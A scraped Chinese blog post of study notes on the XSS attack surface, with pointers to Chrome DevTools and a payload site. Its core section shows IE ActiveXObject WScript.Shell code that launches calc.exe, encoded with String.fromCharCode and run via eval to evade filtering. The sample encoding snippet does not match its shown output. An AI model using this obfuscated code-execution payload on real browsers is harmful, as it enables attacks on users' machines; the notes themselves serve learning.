2019-12-20

2012 年 6 月 16 日

最近在网上看师傅们面试各大厂的面试经历和心得体会文章。然后被某问题吸引…
能想到XSS的最大攻击面是什么？
发现学的知识点都是 XSS 漏洞的挖掘和一些 Bypass。对于XSS的攻击面的研究并不深入。于是又看了很多网上的文章，下面对XSS的攻击面进行小结。

0x01 Chrome DevTools

首先很重要的是在 Chrome DevTools 中调试 JavaScript。

Chrome的调试技巧

在 Chrome DevTools 中调试 JavaScript 入门

0x02 XSS payloads

一个 XSS payloads的网站 —— xss-payloads

含有很多之前没学过的姿势，看了些代码，发现前端知识匮乏，慢慢研究吧～

0x03 ActiveXObject 从 XSS 到 RCE (IE)

首先更改 IE 浏览器安全配置

控制台运行

var o = new ActiveXObject("WScript.Shell");
o.run("calc.exe");

对 JS 进行加密

var str = "HELLO WORLD";
var n = str.charCodeAt(str.length-1);

加密后得

String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,115,104,101,108,108,39,41,59,10,111,46,114,117,110,40,39,99,97,108,99,46,101,120,101,39,41,59,10)

一个例子实战

eval(String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,115,104,101,108,108,39,41,59,10,111,46,114,117,110,40,39,99,97,108,99,46,101,120,101,39,41,59,10));

M	T	W	T	F	S	S
« Jan
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30

演道网

2019-12-20

0x01 Chrome DevTools

0x02 XSS payloads

0x03 ActiveXObject 从 XSS 到 RCE (IE)

About The Author

peace

0x01 Chrome DevTools

0x02 XSS payloads

0x03 ActiveXObject 从 XSS 到 RCE (IE)

Related Posts

About The Author

peace